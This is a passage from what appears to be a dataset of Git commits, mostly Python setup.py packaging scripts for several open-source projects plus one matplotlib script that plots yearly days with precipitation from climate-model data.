url = "http://github.com/ldo/dbussy",
py_modules = ["dbussy"],
)
| lgpl-2.1 | Python | |
475458a322525f429b31fe54f1295685b2195c39 | Add setup.py | scolby33/address_extractor | setup.py | setup.py | """Setup module for the address_extractor package"""
import setuptools
import codecs # To use a consistent encoding
import os
import re
#################################################################
PACKAGES = setuptools.find_packages(where='src')
META_PATH = os.path.join('src', 'address_extractor', '__init__.py')
KEYWORDS = ['']
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'License :: Other/Proprietary License',
'Programming Language :: Python :: 3.5',
'Topic :: Office/Business'
]
INSTALL_REQUIRES = ['usaddress']
EXTRAS_REQUIRE = {}
CONSOLE_ENTRY_POINTS = ['address_extractor=address_extractor.__main__:main']
#################################################################
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
"""Build an absolute path from *parts* and return the contents of the resulting file. Assume UTF-8 encoding."""
with codecs.open(os.path.join(HERE, *parts), 'rb', 'utf-8') as f:
return f.read()
META_FILE = read(META_PATH)
def find_meta(meta):
"""Extract __*meta*__ from META_FILE"""
meta_match = re.search(
r'^__{meta}__ = ["\']([^"\']*)["\']'.format(meta=meta),
META_FILE, re.M
)
if meta_match:
return meta_match.group(1)
raise RuntimeError('Unable to find __{meta}__ string'.format(meta=meta))
def get_long_description():
"""Get the long_description from the README.md file. Assume UTF-8 encoding."""
with codecs.open(os.path.join(HERE, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
if __name__ == '__main__':
setuptools.setup(
name = find_meta('title'),
version = find_meta('version'),
description = find_meta('description'),
long_description = get_long_description(),
url = find_meta('url'),
author = find_meta('author'),
author_email = find_meta('email'),
maintainer = find_meta('author'),
license = find_meta('license'),
classifiers = CLASSIFIERS,
keywords = KEYWORDS,
packages = PACKAGES,
package_dir = {'': 'src'},
install_requires = INSTALL_REQUIRES,
extras_require = EXTRAS_REQUIRE,
entry_points = {
'console_scripts': CONSOLE_ENTRY_POINTS
}
)
| mit | Python | |
72af391ec00facfbabc8ac89ff3bea1b54799d97 | Add plot of days per year with precip | akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem | htdocs/plotting/auto/scripts/p50.py | htdocs/plotting/auto/scripts/p50.py | import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import psycopg2.extras
import pyiem.nws.vtec as vtec
from pyiem.network import Table as NetworkTable
import numpy as np
import pytz
PDICT = {
"hadgem=a1b": "HADGEM A1B",
"cnrm=a1b" : "CNRM A1B",
"echam5=a1b" : "ECHAM5 A1B",
"echo=a1b" : "ECHO A1B",
"pcm=a1b" : "PCM A1B",
"miroc_hi=a1b": "MIROC_HI A1B",
"cgcm3_t47=a1b": "CGCM3_T47 A1B",
"giss_aom=a1b": "GISS_AOM A1B",
"hadcm3=a1b": "HADCM3 A1B",
"cgcm3_t63=a1b": "CGCM3_T63 A1B",
}
def get_description():
""" Return a dict describing how to call this plotter """
d = dict()
d['cache'] = 86400
d['description'] = """ """
d['arguments'] = [
dict(type='networkselect', name='station', network='CSCAP',
default='ISUAG', label='Select CSCAP Site:'),
dict(type='select', name='model', default='echo=a1b',
label='Select Model:', options=PDICT)
]
return d
def plotter( fdict ):
""" Go """
pgconn = psycopg2.connect(database='coop', host='iemdb', user='nobody')
cursor = pgconn.cursor(cursor_factory=psycopg2.extras.DictCursor)
station = fdict.get('station', 'ISUAG')
nt = NetworkTable("CSCAP")
clstation = nt.sts[station]['climate_site']
(model, scenario) = fdict.get('model', 'hadgem=a1b').split("=")
(fig, ax) = plt.subplots(1, 1)
cursor.execute("""
SELECT extract(year from day) as yr, sum(case when precip > 0
THEN 1 else 0 end) from hayhoe_daily WHERE precip is not null and
station = %s and model = %s and scenario = %s
GROUP by yr ORDER by yr ASC
""", (clstation, model, scenario))
years = []
precip = []
for row in cursor:
years.append(row[0])
precip.append(row[1])
ax.bar(years, precip, ec='b', fc='b')
ax.grid(True)
ax.set_ylabel("Days Per Year")
ax.set_title("%s %s\n%s %s :: Days per Year with Measureable Precip" % (
station, nt.sts[station]['name'], model,
scenario))
return fig
| mit | Python | |
a950eb82f62f98900db8dcc4f30fd444f760b6e0 | Bump for 1.9.9-04 | bopo/cookiecutter-django,schacki/cookiecutter-django,mistalaba/cookiecutter-django,hairychris/cookiecutter-django,thisjustin/cookiecutter-django,pydanny/cookiecutter-django,ad-m/cookiecutter-django,asyncee/cookiecutter-django,hackebrot/cookiecutter-django,trungdong/cookiecutter-django,luzfcb/cookiecutter-django,hackebrot/cookiecutter-django,ryankanno/cookiecutter-django,topwebmaster/cookiecutter-django,ryankanno/cookiecutter-django,topwebmaster/cookiecutter-django,schacki/cookiecutter-django,Parbhat/cookiecutter-django-foundation,asyncee/cookiecutter-django,pydanny/cookiecutter-django,Parbhat/cookiecutter-django-foundation,pydanny/cookiecutter-django,webyneter/cookiecutter-django,mistalaba/cookiecutter-django,webspired/cookiecutter-django,ddiazpinto/cookiecutter-django,webyneter/cookiecutter-django,webyneter/cookiecutter-django,bopo/cookiecutter-django,trungdong/cookiecutter-django,hairychris/cookiecutter-django,mistalaba/cookiecutter-django,aleprovencio/cookiecutter-django,asyncee/cookiecutter-django,hairychris/cookiecutter-django,bopo/cookiecutter-django,hackebrot/cookiecutter-django,hackebrot/cookiecutter-django,ddiazpinto/cookiecutter-django,luzfcb/cookiecutter-django,thisjustin/cookiecutter-django,topwebmaster/cookiecutter-django,ryankanno/cookiecutter-django,aleprovencio/cookiecutter-django,ad-m/cookiecutter-django,thisjustin/cookiecutter-django,schacki/cookiecutter-django,webspired/cookiecutter-django,bopo/cookiecutter-django,luzfcb/cookiecutter-django,asyncee/cookiecutter-django,Parbhat/cookiecutter-django-foundation,gappsexperts/cookiecutter-django,trungdong/cookiecutter-django,webspired/cookiecutter-django,aleprovencio/cookiecutter-django,gappsexperts/cookiecutter-django,pydanny/cookiecutter-django,mistalaba/cookiecutter-django,ddiazpinto/cookiecutter-django,Parbhat/cookiecutter-django-foundation,ddiazpinto/cookiecutter-django,ad-m/cookiecutter-django,webspired/cookiecutter-django,hairychris/cookiecutter-django,gappsexperts/cookiecutter-django,gappsexperts/cookiecutter-django,aleprovencio/cookiecutter-django,schacki/cookiecutter-django,ad-m/cookiecutter-django,ryankanno/cookiecutter-django,trungdong/cookiecutter-django,luzfcb/cookiecutter-django,topwebmaster/cookiecutter-django,thisjustin/cookiecutter-django,webyneter/cookiecutter-django | setup.py | setup.py | #!/usr/bin/env python
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Our version ALWAYS matches the version of Django we support
# If Django has a new release, we branch, tag, then update this setting after the tag.
version = '1.9.9-04'
if sys.argv[-1] == 'tag':
os.system('git tag -a %s -m "version %s"' % (version, version))
os.system('git push --tags')
sys.exit()
with open('README.rst') as readme_file:
long_description = readme_file.read()
setup(
name='cookiecutter-django',
version=version,
description='A Cookiecutter template for creating production-ready Django projects quickly.',
long_description=long_description,
author='Daniel Roy Greenfeld',
author_email='pydanny@gmail.com',
url='https://github.com/pydanny/cookiecutter-django',
packages=[],
license='BSD',
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Framework :: Django :: 1.9',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Software Development',
],
keywords=(
'cookiecutter, Python, projects, project templates, django, '
'skeleton, scaffolding, project directory, setup.py'
),
)
| #!/usr/bin/env python
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Our version ALWAYS matches the version of Django we support
# If Django has a new release, we branch, tag, then update this setting after the tag.
version = '1.9.9-03'
if sys.argv[-1] == 'tag':
os.system('git tag -a %s -m "version %s"' % (version, version))
os.system('git push --tags')
sys.exit()
with open('README.rst') as readme_file:
long_description = readme_file.read()
setup(
name='cookiecutter-django',
version=version,
description='A Cookiecutter template for creating production-ready Django projects quickly.',
long_description=long_description,
author='Daniel Roy Greenfeld',
author_email='pydanny@gmail.com',
url='https://github.com/pydanny/cookiecutter-django',
packages=[],
license='BSD',
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Framework :: Django :: 1.9',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Software Development',
],
keywords=(
'cookiecutter, Python, projects, project templates, django, '
'skeleton, scaffolding, project directory, setup.py'
),
)
| bsd-3-clause | Python |
1d693c0e32cb3247e861c819d389f51fc2fc6be0 | add setup.py | encorehu/webqq | setup.py | setup.py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from setuptools import setup, find_packages
setup(
name = "webqq",
version="0.1.0",
packages = find_packages(),
zip_safe = False,
description = "python 2.7.x webqq lib, for fun.",
long_description = "python 2.7.x webqq lib, for fun.",
author = "encorehu",
author_email = "huyoo353@126.com",
license = "MIT",
keywords = ("webqq", "egg"),
platforms = "all",
url = "https://github.com/encorehu/webqq",
)
| mit | Python | |
e3c32fb0775a17d47906c5fdd48a9809a00430b3 | include kismon.windows in the setup.py | krzotr/kismon,Kismon/kismon,vaginessa/kismon | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name='kismon',
version='0.2',
description='PyGTK based kismet client',
author='Patrick Salecker',
author_email='mail@salecker.org',
url='http://www.salecker.org/software/kismon/en',
license='BSD',
packages=['kismon', 'kismon.windows'],
scripts=['bin/kismon'],
platforms='UNIX',
data_files = [('/usr/share/applications', ['files/kismon.desktop']),
('/usr/share/kismon',
['files/position.png',
'files/minimal-rules.xml', 'files/night-rules.xml']),
],
)
| #!/usr/bin/env python
from distutils.core import setup
setup(name='kismon',
version='0.2',
description='PyGTK based kismet client',
author='Patrick Salecker',
author_email='mail@salecker.org',
url='http://www.salecker.org/software/kismon/en',
license='BSD',
packages=['kismon'],
scripts=['bin/kismon'],
platforms='UNIX',
data_files = [('/usr/share/applications', ['files/kismon.desktop']),
('/usr/share/kismon',
['files/position.png',
'files/minimal-rules.xml', 'files/night-rules.xml']),
],
)
| bsd-3-clause | Python |
392458f6d5cea3d723d86d6238d1f1b46cfc95a5 | Add a setup.py | zain/jogging | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name='jogging',
version='0.1',
description='Jogging makes logging in django easier',
author='Zain',
author_email='zain@inzain.net',
url='',
packages = ['jogging',],
package_dir = {'jogging':'jogging'},
)
| mit | Python | |
e67e2ca56310c35a0a8bb30ecb9fceeb55dcc9f5 | Add setup.py | tiwilliam/sverigesradio | setup.py | setup.py | # -*- coding: utf8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
version='0.3',
name='sverigesradio',
description='Python bindings for Sveriges Radio API',
author='William Tisäter',
author_email='william@defunct.cc',
packages=['sverigesradio'],
install_requires=['requests >= 2.1.0'],
url='https://github.com/tiwilliam/sverigesradio',
classifiers=['Programming Language :: Python',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3'],
license='MIT License',
keywords='sr sverigesradio'
)
| mit | Python | |
ec087b033b8e9b4172a4d5e77a26a10ea16ffb64 | Add setup.py | LuqueDaniel/pybooru,buzzbyte/pybooru,LuqueDaniel/pybooru,buzzbyte/pybooru | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup
from setuptools import find_packages
__author__ = 'Daniel Luque <danielluque14@gmail.com>'
__version__ = '1.0.0'
setup(
name='pybooru',
version=__version__,
author=__author__
author_email="danielluque14@gmail.com",
url="http://mundogeek.net/tutorial-python/",
license="GPL",
packages=find_packages(),
include_package_data=True,
install_requires=['simplejson'],
) | mit | Python | |
072d6a2ad1ab293427aadd074c5485483f701eb1 | Add a setuptools wrapper | smarkets/statprof,bos/statprof.py | setup.py | setup.py | #!/usr/bin/env python
import os
from setuptools import find_packages, setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "statprof",
version = "0.1",
author = "Jeff Muizelaar",
author_email = "jmuizelaar@mozilla.com",
description = ("Statistical profiling for Python"),
license = "LGPL",
keywords = "profiling",
url = "http://packages.python.org/statprof",
py_modules = ['statprof'],
long_description = read('README'),
classifiers = [
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: LGPL License",
],
)
| lgpl-2.1 | Python | |
8500effa4ade8ecb3eff0501a749a869467a8768 | Add setup.py | omf2097/pyomftools,omf2097/pyomftools | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(
name='OMFTools',
version='0.1',
description='Tools for modifying OMF2097 files',
author='Tuomas Virtanen',
author_email='katajakasa@gmail.com',
url='https://github.com/omf2097/pyomftools',
packages=['omftools', 'omftools.pyshadowdive'],
)
| mit | Python | |
7b8f76d53fb820e4fd429f880557bf52ec5dc4be | Add setup | Rhathe/fixtureupper | setup.py | setup.py | from setuptools import setup
setup(
name='fixture-generator',
version='0.0.1',
packages=['fixture-generator'],
url='https://github.com/Rhathe/Fixture-Generator',
license='MIT',
author='Ramon Sandoval',
description='SqlAlchemy Fixture Generator',
long_description='SqlAlchemy Fixture Generator',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Utilities',
],
install_requires=[
],
)
| mit | Python | |
12dce1474946d1a9bc41681af6dc2723ecfcc7f1 | Add setup.py | carlcarl/grabflickr | setup.py | setup.py | from setuptools import setup
from setuptools import find_packages
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name='downflickr',
description='Download photoset of flickr using gevent',
long_description=open('README.rst').read(),
version='0.0.1',
author='carlcarl',
author_email='carlcarlking@gmail.com',
url='https://github.com/carlcarl/downflickr',
packages=find_packages(),
install_requires=required,
license='MIT',
entry_points={
'console_scripts': [
'downflickr = downflickr.downflickr:main',
]
},
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Operating System :: Unix',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries',
]
)
| mit | Python | |
3cd157c12224ba8cee54be36f7da92f30c38964f | Update issue 120 Moving parsers and serializer implementations into rdflib.plugins package | yingerj/rdflib,yingerj/rdflib,avorio/rdflib,marma/rdflib,dbs/rdflib,marma/rdflib,marma/rdflib,RDFLib/rdflib,RDFLib/rdflib,dbs/rdflib,avorio/rdflib,RDFLib/rdflib,avorio/rdflib,marma/rdflib,RDFLib/rdflib,armandobs14/rdflib,yingerj/rdflib,ssssam/rdflib,ssssam/rdflib,ssssam/rdflib,armandobs14/rdflib,dbs/rdflib,avorio/rdflib,dbs/rdflib,armandobs14/rdflib,armandobs14/rdflib,yingerj/rdflib,ssssam/rdflib | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
# Install rdflib
from rdflib import __version__
setup(
name = 'rdflib',
version = __version__,
description = "RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information.",
author = "Daniel 'eikeon' Krech",
author_email = "eikeon@eikeon.com",
maintainer = "Daniel 'eikeon' Krech",
maintainer_email = "eikeon@eikeon.com",
url = "http://rdflib.net/",
license = "http://rdflib.net/latest/LICENSE",
platforms = ["any"],
classifiers = ["Programming Language :: Python",
"License :: OSI Approved :: BSD License",
"Topic :: Software Development :: Libraries :: Python Modules",
"Operating System :: OS Independent",
"Natural Language :: English",
],
long_description = \
"""RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information.
The library contains parsers and serializers for RDF/XML, N3,
NTriples, Turtle, TriX and RDFa . The library presents a Graph
interface which can be backed by any one of a number of Store
implementations, including, Memory, MySQL, Redland, SQLite,
Sleepycat and SQLObject.
If you have recently reported a bug marked as fixed, or have a craving for
the very latest, you may want the development version instead:
http://rdflib.googlecode.com/svn/trunk#egg=rdflib-dev
""",
download_url = "http://rdflib.net/rdflib-%s.tar.gz" % __version__,
packages = ['rdflib',
'rdflib/plugins',
'rdflib/plugins',
'rdflib/plugins/parsers',
'rdflib/plugins/parsers/rdfa',
'rdflib/plugins/parsers/rdfa/transform',
'rdflib/plugins/serializers',
],
)
| #!/usr/bin/env python
from distutils.core import setup
# Install rdflib
from rdflib import __version__
setup(
name = 'rdflib',
version = __version__,
description = "RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information.",
author = "Daniel 'eikeon' Krech",
author_email = "eikeon@eikeon.com",
maintainer = "Daniel 'eikeon' Krech",
maintainer_email = "eikeon@eikeon.com",
url = "http://rdflib.net/",
license = "http://rdflib.net/latest/LICENSE",
platforms = ["any"],
classifiers = ["Programming Language :: Python",
"License :: OSI Approved :: BSD License",
"Topic :: Software Development :: Libraries :: Python Modules",
"Operating System :: OS Independent",
"Natural Language :: English",
],
long_description = \
"""RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information.
The library contains parsers and serializers for RDF/XML, N3,
NTriples, Turtle, TriX and RDFa . The library presents a Graph
interface which can be backed by any one of a number of Store
implementations, including, Memory, MySQL, Redland, SQLite,
Sleepycat and SQLObject.
If you have recently reported a bug marked as fixed, or have a craving for
the very latest, you may want the development version instead:
http://rdflib.googlecode.com/svn/trunk#egg=rdflib-dev
""",
download_url = "http://rdflib.net/rdflib-%s.tar.gz" % __version__,
packages = ['rdflib',
'rdflib/plugins',
'rdflib/syntax',
'rdflib/syntax/parsers',
'rdflib/syntax/parsers/rdfa',
'rdflib/syntax/parsers/rdfa/transform',
'rdflib/syntax/serializers',
],
)
| bsd-3-clause | Python |
43947b54e8774306ead2fa86ef587526f058e572 | Add manage.py for quick access to management commands | zostera/django-modeltrans,zostera/django-modeltrans | manage.py | manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.app.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| bsd-3-clause | Python | |
23f797bcf30bb7de26d1558e5eafc7818141f640 | Create __init__.py | marcoikeda/attribution_model | attribution/__init__.py | attribution/__init__.py | mit | Python | ||
34530a8b60bc1ebfe9bdd56250ecf23e05b8c935 | add setup.py | OpenTouch/vsphere-client | setup.py | setup.py | #!/usr/bin/env python2.7
from setuptools import setup
long_description = """\
vSphere Client for Python is pure-Python implementation of
collection tools to access to VMware's vSphere API.
It provides both a Python API and a CLI to manage vSphere.
"""
pkgdir = {'': 'src'}
setup(
name = 'vsphere',
version = '1.0.0',
description = 'vsphere-cli: VMware vSphere API and CLI management tool',
keywords = 'vmware api vsphere cli admin tool',
long_description = long_description,
author = 'Alcatel-Lucent Enterprise Personal Cloud R&D',
author_email = 'dev@opentouch.net',
url = 'https://github.com/OpenTouch/vsphere-client',
package_dir=pkgdir,
packages=['vsphere'],
include_package_data=True,
scripts=['bin/vsphere'],
platforms = ['All'],
license = 'Apache 2.0',
)
| apache-2.0 | Python | |
6b3c3a2e0dd4f47fc014f86fa0e85d38e11366b7 | Create run_test.py | kwilcox/staged-recipes,jakirkham/staged-recipes,chrisburr/staged-recipes,igortg/staged-recipes,cpaulik/staged-recipes,basnijholt/staged-recipes,johanneskoester/staged-recipes,birdsarah/staged-recipes,NOAA-ORR-ERD/staged-recipes,guillochon/staged-recipes,jochym/staged-recipes,synapticarbors/staged-recipes,ceholden/staged-recipes,sodre/staged-recipes,isuruf/staged-recipes,rmcgibbo/staged-recipes,johanneskoester/staged-recipes,jjhelmus/staged-recipes,stuertz/staged-recipes,dschreij/staged-recipes,patricksnape/staged-recipes,petrushy/staged-recipes,chohner/staged-recipes,rvalieris/staged-recipes,petrushy/staged-recipes,mariusvniekerk/staged-recipes,guillochon/staged-recipes,mcs07/staged-recipes,chohner/staged-recipes,hadim/staged-recipes,mcs07/staged-recipes,Cashalow/staged-recipes,dschreij/staged-recipes,jjhelmus/staged-recipes,conda-forge/staged-recipes,larray-project/staged-recipes,NOAA-ORR-ERD/staged-recipes,hadim/staged-recipes,glemaitre/staged-recipes,patricksnape/staged-recipes,sodre/staged-recipes,Juanlu001/staged-recipes,asmeurer/staged-recipes,mariusvniekerk/staged-recipes,jakirkham/staged-recipes,ceholden/staged-recipes,SylvainCorlay/staged-recipes,igortg/staged-recipes,ocefpaf/staged-recipes,rvalieris/staged-recipes,sodre/staged-recipes,sannykr/staged-recipes,sannykr/staged-recipes,pmlandwehr/staged-recipes,SylvainCorlay/staged-recipes,birdsarah/staged-recipes,goanpeca/staged-recipes,synapticarbors/staged-recipes,ReimarBauer/staged-recipes,conda-forge/staged-recipes,cpaulik/staged-recipes,jochym/staged-recipes,ocefpaf/staged-recipes,barkls/staged-recipes,scopatz/staged-recipes,Cashalow/staged-recipes,basnijholt/staged-recipes,Juanlu001/staged-recipes,isuruf/staged-recipes,rmcgibbo/staged-recipes,chrisburr/staged-recipes,barkls/staged-recipes,asmeurer/staged-recipes,ReimarBauer/staged-recipes,larray-project/staged-recipes,scopatz/staged-recipes,shadowwalkersb/staged-recipes,goanpeca/staged-recipes,stuertz/staged-recipes,pmlandwehr/staged-recipes,shadowwalkersb/staged-recipes,glemaitre/staged-recipes,kwilcox/staged-recipes | recipes/pytest-django/run_test.py | recipes/pytest-django/run_test.py | import django
from django.conf import settings
settings.configure(INSTALLED_APPS=['pytest_django', 'django.contrib.contenttypes', 'django.contrib.auth'])
django.setup()
import pytest_django
| bsd-3-clause | Python | |
4a7a103204989af7e2b6bc97a4109d81beebd34c | Add python_requires to setup.py (#2465) | pydata/xarray,jhamman/xarray,jhamman/xarray,pydata/xarray,markelg/xray,jhamman/xray,pydata/xarray,jhamman/xarray,shoyer/xarray,shoyer/xarray,shoyer/xray,markelg/xray,chunweiyuan/xarray,xray/xray,markelg/xray | setup.py | setup.py | #!/usr/bin/env python
import sys
from setuptools import find_packages, setup
import versioneer
DISTNAME = 'xarray'
LICENSE = 'Apache'
AUTHOR = 'xarray Developers'
AUTHOR_EMAIL = 'xarray@googlegroups.com'
URL = 'https://github.com/pydata/xarray'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['numpy >= 1.12', 'pandas >= 0.19.2']
TESTS_REQUIRE = ['pytest >= 2.7.1']
if sys.version_info[0] < 3:
TESTS_REQUIRE.append('mock')
DESCRIPTION = "N-D labeled arrays and datasets in Python"
LONG_DESCRIPTION = """
**xarray** (formerly **xray**) is an open source project and Python package
that aims to bring the labeled data power of pandas_ to the physical sciences,
by providing N-dimensional variants of the core pandas data structures.
Our goal is to provide a pandas-like and pandas-compatible toolkit for
analytics on multi-dimensional arrays, rather than the tabular data for which
pandas excels. Our approach adopts the `Common Data Model`_ for self-
describing scientific data in widespread use in the Earth sciences:
``xarray.Dataset`` is an in-memory representation of a netCDF file.
.. _pandas: http://pandas.pydata.org
.. _Common Data Model: http://www.unidata.ucar.edu/software/thredds/current/netcdf-java/CDM
.. _netCDF: http://www.unidata.ucar.edu/software/netcdf
.. _OPeNDAP: http://www.opendap.org/
Important links
---------------
- HTML documentation: http://xarray.pydata.org
- Issue tracker: http://github.com/pydata/xarray/issues
- Source code: http://github.com/pydata/xarray
- SciPy2015 talk: https://www.youtube.com/watch?v=X0pAhJgySxk
""" # noqa
setup(name=DISTNAME,
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
install_requires=INSTALL_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
packages=find_packages(),
package_data={'xarray': ['tests/data/*']})
| #!/usr/bin/env python
import sys
from setuptools import find_packages, setup
import versioneer
DISTNAME = 'xarray'
LICENSE = 'Apache'
AUTHOR = 'xarray Developers'
AUTHOR_EMAIL = 'xarray@googlegroups.com'
URL = 'https://github.com/pydata/xarray'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['numpy >= 1.12', 'pandas >= 0.19.2']
TESTS_REQUIRE = ['pytest >= 2.7.1']
if sys.version_info[0] < 3:
TESTS_REQUIRE.append('mock')
DESCRIPTION = "N-D labeled arrays and datasets in Python"
LONG_DESCRIPTION = """
**xarray** (formerly **xray**) is an open source project and Python package
that aims to bring the labeled data power of pandas_ to the physical sciences,
by providing N-dimensional variants of the core pandas data structures.
Our goal is to provide a pandas-like and pandas-compatible toolkit for
analytics on multi-dimensional arrays, rather than the tabular data for which
pandas excels. Our approach adopts the `Common Data Model`_ for self-
describing scientific data in widespread use in the Earth sciences:
``xarray.Dataset`` is an in-memory representation of a netCDF file.
.. _pandas: http://pandas.pydata.org
.. _Common Data Model: http://www.unidata.ucar.edu/software/thredds/current/netcdf-java/CDM
.. _netCDF: http://www.unidata.ucar.edu/software/netcdf
.. _OPeNDAP: http://www.opendap.org/
Important links
---------------
- HTML documentation: http://xarray.pydata.org
- Issue tracker: http://github.com/pydata/xarray/issues
- Source code: http://github.com/pydata/xarray
- SciPy2015 talk: https://www.youtube.com/watch?v=X0pAhJgySxk
""" # noqa
setup(name=DISTNAME,
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
install_requires=INSTALL_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
packages=find_packages(),
package_data={'xarray': ['tests/data/*']})
| apache-2.0 | Python |
09d2d84c73bd3c232bdc78d1c46be43c676ef7ac | remove email | adriangb/scikeras | setup.py | setup.py | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open("README.md") as readme_file:
readme = readme_file.read()
with open("HISTORY.md") as history_file:
history = history_file.read()
with open("requirements.txt") as f:
requirements = f.read().splitlines()
setup_requirements = [
"pytest-runner",
]
test_requirements = [
"pytest>=3",
]
setup(
author="Adrian Garcia Badaracco",
python_requires=">=3.6",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
description="Scikit-Learn API implementation for Keras.",
install_requires=requirements,
license="MIT license",
long_description=readme + "\n\n" + history,
long_description_content_type="text/markdown",
include_package_data=True,
keywords="scikeras",
name="scikeras",
packages=find_packages(include=["scikeras", "scikeras.*"]),
setup_requires=setup_requirements,
test_suite="tests",
tests_require=test_requirements,
url="https://github.com/adriangb/scikeras",
version="0.1.7",
zip_safe=False,
)
| mit | Python | |
f0ad13539a040fe019cc299979caa5764b581faf | Add simple setuptools based build script | qnorsten/svtplay-dl,OakNinja/svtplay-dl,selepo/svtplay-dl,leakim/svtplay-dl,dalgr/svtplay-dl,leakim/svtplay-dl,olof/svtplay-dl,leakim/svtplay-dl,iwconfig/svtplay-dl,qnorsten/svtplay-dl,dalgr/svtplay-dl,spaam/svtplay-dl,OakNinja/svtplay-dl,olof/svtplay-dl,OakNinja/svtplay-dl,selepo/svtplay-dl,iwconfig/svtplay-dl,spaam/svtplay-dl | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
import sys
setup(
name = "svtplay-dl",
version = "0.9.2013.03.06", # FIXME - extract from svtplay-dl
packages = find_packages(
'lib',
exclude=["tests", "*.tests", "*.tests.*"]),
package_dir = {'': 'lib'},
scripts = ['svtplay-dl'],
author = "Johan Andersson",
author_email = "j@i19.se",
description = "Command-line program to download videos from various video on demand sites",
license = "MIT",
url = "https://github.com/spaam/svtplay-dl",
)
| mit | Python | |
7fb257178f032feaa13a7761cf242f8be202b07d | Add setup.py | BuzzFeedNews/bikeshares | setup.py | setup.py | import sys
from setuptools import setup, find_packages
setup(
name="bikeshares",
version="0.0.0",
description="Standardized access to the data published by bicycle sharing programs.",
long_description="",
